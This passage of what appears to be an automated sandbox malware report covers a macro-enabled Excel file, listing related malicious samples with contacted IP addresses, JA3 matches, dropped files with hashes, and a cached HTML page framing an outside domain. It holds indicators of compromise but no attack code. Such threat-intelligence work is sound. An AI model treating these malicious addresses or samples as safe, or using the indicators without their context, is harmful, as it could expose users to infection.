                                                              4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                              • 50.87.166.59
                                                              c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                              • 108.179.242.122
                                                              c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                              • 108.179.242.122
                                                              6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                              • 162.241.24.47
                                                              DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                              • 162.241.169.22
                                                              generated check 662732.xlsmGet hashmaliciousBrowse
                                                              • 192.185.177.61
                                                              4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                              • 162.241.24.47
                                                              QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                              • 192.185.131.134
                                                              gunzipped.exeGet hashmaliciousBrowse
                                                              • 192.254.189.182
                                                              Purchase Order #DH0124 REF#SCAN005452 EXW HMM SO#UKL080947 - FD210268-001.xlsx.exeGet hashmaliciousBrowse
                                                              • 162.144.13.239
                                                              0145d964_by_Libranalysis.exeGet hashmaliciousBrowse
                                                              • 162.241.169.22
                                                              HXxk3mzZeW.exeGet hashmaliciousBrowse
                                                              • 192.185.140.111
                                                              HCU213DES.docGet hashmaliciousBrowse
                                                              • 162.241.169.22
                                                              UNIFIEDLAYER-AS-1USstatistic-2072807337.xlsmGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                              • 192.254.233.89
                                                              presentation.jarGet hashmaliciousBrowse
                                                              • 50.87.249.219
                                                              presentation.jarGet hashmaliciousBrowse
                                                              • 50.87.249.219
                                                              GK58.vbsGet hashmaliciousBrowse
                                                              • 192.185.21.136
                                                              catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                              • 192.185.20.98
                                                              catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                              • 192.185.20.98
                                                              4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                              • 50.87.166.59
                                                              c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                              • 108.179.242.122
                                                              c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                              • 108.179.242.122
                                                              6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                              • 162.241.24.47
                                                              DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                              • 162.241.169.22
                                                              generated check 662732.xlsmGet hashmaliciousBrowse
                                                              • 192.185.177.61
                                                              4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                              • 162.241.24.47
                                                              QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                              • 192.185.131.134
                                                              gunzipped.exeGet hashmaliciousBrowse
                                                              • 192.254.189.182
                                                              Purchase Order #DH0124 REF#SCAN005452 EXW HMM SO#UKL080947 - FD210268-001.xlsx.exeGet hashmaliciousBrowse
                                                              • 162.144.13.239
                                                              0145d964_by_Libranalysis.exeGet hashmaliciousBrowse
                                                              • 162.241.169.22
                                                              HXxk3mzZeW.exeGet hashmaliciousBrowse
                                                              • 192.185.140.111
                                                              HCU213DES.docGet hashmaliciousBrowse
                                                              • 162.241.169.22

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              37f463bf4616ecd445d4a1937da06e19f97e137e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              e1df57de_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              MV RED SEA.docxGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              MyUY1HeWNL.exeGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              IMG-WA7905432.exeGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              Tree Top.htmlGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              PT6-1152.docGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              s.dllGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              setup-lightshot.exeGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              s.dllGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              8a793b14_by_Libranalysis.exeGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              pic05678063.exeGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              6de2089f_by_Libranalysis.exeGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              e17486cd_by_Libranalysis.exeGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89
                                                              Almadeena-Bakery-005445536555665445.scr.exeGet hashmaliciousBrowse
                                                              • 192.185.5.2
                                                              • 192.254.233.89

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\44CD6028.png
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):34787
                                                              Entropy (8bit):7.9883689087667955
                                                              Encrypted:false
                                                              SSDEEP:768:XbyxVN2hP86XpVBxUmtCQHcQpKvtcFM/MoJ97bk3Ueu:m92hjPcQpWUot9Eg
                                                              MD5:2C5A59B7F30E5E41412EC22FDEA1DBB5
                                                              SHA1:9A64FB6A68683EEC580A881725DBD146E80D06B1
                                                              SHA-256:E872E66F60AE5651AE96A2C2A88D07B0D1C96CDDD45F787AB04237891AD4E8FB
                                                              SHA-512:2D494F44E1DA36794C3E707BF1173EE63E2CF3101E3B5EA60D71A194DA9A6A1EB6B9C166B7C1ACAA2D455B9C6413D0FEE40AD38972C076183EF167818D7E92EC
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+......IDATx^....]U.>..{'.......".bA.6.6..o/3...:......b....{HBBz./........[..%yI.!>...}.^{.o.........^..R.......=..c..-Z.n]cc...W.^...........z..2.9s.<....?|...._j.&.....R.......K...\.V..ukS..sgKKKWWWkk._@s....<x.Q..t..1bt.5k.QG....,X0f..Y.T...............k..y..k..K6^....v.x}..p....vX.MK..5.....j...X....8...~......z.{.aJ.Q...{.._|...|.....{.ui..M.)^...I.....};>..[n...../^..hnn.t.^.}..S.Ly.3.q.W.v.i)d.....W.x=p.".d@k.(.y...kE..P......mH"F^...\q..v)....K...R...:O..i..G......?...!.....y.^..W.....:u...).c.j ..=....X......<..u.]w.7.H.;.GE*...x.;^..WM.8.....G..x.?.Z*....:F..~..k..f.%.kN {..}(.d..C.z...2.G....x...S*.^....<..?..o...ME`......s.9.{.......>;.5....o.T....,..I.....?...o.w..6../~..>.....S.i1.Q.)^..VIe.........~._../..G...!C......|..k]]]v.x..wt......=.Y0...Z.9......=t.....]{S.)^.Mm...p..m......M.6....r.L.6MT..3'M.4{.l~.P[h....Wtttx........#.OR.\.r.e@
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F386603.png
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):8301
                                                              Entropy (8bit):7.970711494690041
                                                              Encrypted:false
                                                              SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                              MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                              SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                              SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                              SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B6A5D209.png
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):557
                                                              Entropy (8bit):7.343009301479381
                                                              Encrypted:false
                                                              SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                              MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                              SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                              SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                              SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DAFC4076.png
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):848
                                                              Entropy (8bit):7.595467031611744
                                                              Encrypted:false
                                                              SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                              MD5:02DB1068B56D3FD907241C2F3240F849
                                                              SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                              SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                              SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\suspendedpage[1].htm
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:HTML document, ASCII text
                                                              Category:downloaded
                                                              Size (bytes):494
                                                              Entropy (8bit):4.962239405540505
                                                              Encrypted:false
                                                              SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                              MD5:0357AA49EA850B11B99D09A2479C321B
                                                              SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                              SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                              SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              IE Cache URL:https://anaheimdermatologists.com/cgi-sys/suspendedpage.cgi
                                                              Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
                                                              C:\Users\user\AppData\Local\Temp\32820000
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):107618
                                                              Entropy (8bit):7.91601370112133
                                                              Encrypted:false
                                                              SSDEEP:1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQfDm:nl+yo9opH8x+3xs6ZQy
                                                              MD5:D297DF8319BBE1CBA66C1227F53BCDB1
                                                              SHA1:8B8B1C4ED555046028FACCB7BDD7F124A2B7FE5C
                                                              SHA-256:8BA1379D469ACF3184BABC90FC9C952C1B178E0EE9E470D5D1CE162D91DFF7FC
                                                              SHA-512:1595A1C66DFC5EB37017AA9A39FA234FD851EDF20121B84EEB5E85958AE58EED893814884768035FFF83C377A587F18647D4A4982E95803E6CA5670059D46E15
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 18:52:18 2019, mtime=Tue May 4 19:30:31 2021, atime=Tue May 4 19:30:31 2021, length=16384, window=hide
                                                              Category:dropped
                                                              Size (bytes):917
                                                              Entropy (8bit):4.678301446154264
                                                              Encrypted:false
                                                              SSDEEP:12:8SPAc20U7cWCHoTY2ya8OuyF+WMjA+N/E2ybD86wpIeYIe8k44t2Y+xIBjKZm:8E+nY20AS8HD7wz7aB6m
                                                              MD5:15D744E452A0B049024E4291FFDCD06D
                                                              SHA1:A338BBEDBE2A5D8041DE306520AD406E972C1671
                                                              SHA-256:3700430035A5B103A7AEB6669AB99C5EF322CF67917EBE328CE4DB059A6FB233
                                                              SHA-512:4EC7444D0759CCCC50B9DBD74E226473D09F71C95B4D5BD8684DE085884C2ECD377DB6BC939180019CF0069D5146863A8E747E13E2A7E736751AC13665A71948
                                                              Malicious:false
                                                              Preview: L..................F..........h.!-...jAT$A....<T$A...@...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qc{..user..B.......N...R......S.....................W..e.n.g.i.n.e.e.r.....~.1......R...Desktop.h.......N...R......Y..............>.....7.#.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......H...............-.......G...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...A}...`.......X.......579569...........!a..%.H.VZAj...,,/..........-$..!a..%.H.VZAj...,,/..........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):123
                                                              Entropy (8bit):4.7468941332957
                                                              Encrypted:false
                                                              SSDEEP:3:bDesBVomxWdadbqd2Oytdbqd2mxWdadbqd2v:bSsjuadbq0tdbqeadbqC
                                                              MD5:4AED8272F2E9BAC97FF3A9E6AF7BACCF
                                                              SHA1:2269919A7F51C40BEEF91C03FF2A05B9BA7E4381
                                                              SHA-256:8867D925737F8D127394C4C8E267FF88EA4C75B8022A2F302490A696AB74031B
                                                              SHA-512:F6FF707EF00F3E0A4BD083A78F09020EE5DF8881D803B78773CBBE9125D528CEE47BBC857DF81D9B459F90FDAFED77F43F07785654B0CB37494215620B63A1A9
                                                              Malicious:false
                                                              Preview: [folders]..Desktop.LNK=0..[misc]..statistic-207394368.LNK=0..statistic-207394368.LNK=0..[misc]..statistic-207394368.LNK=0..
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-207394368.LNK
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:27:01 2020, mtime=Tue May 4 19:30:31 2021, atime=Tue May 4 19:30:31 2021, length=107618, window=hide
                                                              Category:dropped
                                                              Size (bytes):2236
                                                              Entropy (8bit):4.728041713389763
                                                              Encrypted:false
                                                              SSDEEP:48:8HnYc7pFohmnAZiB6pHnYc7pFohmnAZiB6:84cch8AZiK4cch8AZi
                                                              MD5:754469E430760EDD0FB35B864EBF3267
                                                              SHA1:AE7C965D1BBAB636733D9099298ED30AD2CA078E
                                                              SHA-256:A3538E0780B8C1363218C479716E203C41E9C07FEB4ECAF44A1738D377A93A7C
                                                              SHA-512:AFC7E8D9E1417740EB944F831A56B069B6889AA5F0AD31C9D1E0A44602E93BF48841CA5B856FE4004FB8C1E93D0858B945CC4FE6985410907AF7F5F9E220599E
                                                              Malicious:false
                                                              Preview: L..................F.... ......%>.....JT$A....HT$A..b............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1.....>Qc{..user..B.......N...R......S.....................W..e.n.g.i.n.e.e.r.....~.1.....>Qd{..Desktop.h.......N...R......Y..............>.....~.o.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2......R. .STATIS~1.XLS..b......>Qa{.R......R........................s.t.a.t.i.s.t.i.c.-.2.0.7.3.9.4.3.6.8...x.l.s.m.......a...............-.......`...........>.S......C:\Users\user\Desktop\statistic-207394368.xlsm../.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.t.a.t.i.s.t.i.c.-.2.0.7.3.9.4.3.6.8...x.l.s.m.........:..,.LB.)...A}...`.......X.......579569...........!a..%.H.VZAj.......1........-$..!a..%.H.VZAj.......1........-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5
                                                              C:\Users\user\Desktop\33820000
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):107618
                                                              Entropy (8bit):7.91601370112133
                                                              Encrypted:false
                                                              SSDEEP:1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQfDm:nl+yo9opH8x+3xs6ZQy
                                                              MD5:D297DF8319BBE1CBA66C1227F53BCDB1
                                                              SHA1:8B8B1C4ED555046028FACCB7BDD7F124A2B7FE5C
                                                              SHA-256:8BA1379D469ACF3184BABC90FC9C952C1B178E0EE9E470D5D1CE162D91DFF7FC
                                                              SHA-512:1595A1C66DFC5EB37017AA9A39FA234FD851EDF20121B84EEB5E85958AE58EED893814884768035FFF83C377A587F18647D4A4982E95803E6CA5670059D46E15
                                                              Malicious:false
                                                              Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\Desktop\~$statistic-207394368.xlsm
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):330
                                                              Entropy (8bit):1.6081032063576088
                                                              Encrypted:false
                                                              SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                              MD5:836727206447D2C6B98C973E058460C9
                                                              SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                              SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                              SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                              Malicious:true
                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                              C:\Users\user\jordji.nbvt11
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:HTML document, ASCII text
                                                              Category:dropped
                                                              Size (bytes):494
                                                              Entropy (8bit):4.962239405540505
                                                              Encrypted:false
                                                              SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                              MD5:0357AA49EA850B11B99D09A2479C321B
                                                              SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                              SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                              SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                              Malicious:false
                                                              Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.

                                                              Static File Info

                                                              General

                                                              File type:Microsoft Excel 2007+
                                                              Entropy (8bit):7.917058358399405
                                                              TrID:
                                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                              • ZIP compressed archive (8000/1) 16.67%
                                                              File name:statistic-207394368.xlsm
                                                              File size:109084
                                                              MD5:cd5e9899a7fa08e45309f4cf728bedf5
                                                              SHA1:a8671b54099e2d201660d220fc5652d3576bd5e6
                                                              SHA256:0465986113ca6df44638d99a67706662f7336e90c00d981666ba22217cefcfb5
                                                              SHA512:59c81e6bb9dee856614b4881d05f11f374f5d7dfab3bf9c2bc1495baa8a63ac93a8230420b722366f8d3dd718f7aa198250a89b5d1b94cc57a22b5c9d6095fec
                                                              SSDEEP:1536:cutuov3BiTr4GDgM+nG92hjPcQpWUot9E8cNcrAOJOerwzkFBHhr6vQnf+zy7fc:ckuocrZDKGopH8x+8HdoLqp6vif+zUk
                                                              File Content Preview:PK..........!.t...............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                              File Icon

                                                              Icon Hash:74ecd0e2f696908c

                                                              Static OLE Info

                                                              General

                                                              Document Type:OpenXML
                                                              Number of OLE Files:1

                                                              OLE File "statistic-207394368.xlsm"

                                                              Indicators

                                                              Has Summary Info:
                                                              Application Name:
                                                              Encrypted Document:
                                                              Contains Word Document Stream:
                                                              Contains Workbook/Book Stream:
                                                              Contains PowerPoint Document Stream:
                                                              Contains Visio Document Stream:
                                                              Contains ObjectPool Stream:
                                                              Flash Objects Count:
                                                              Contains VBA Macros:

                                                              Macro 4.0 Code

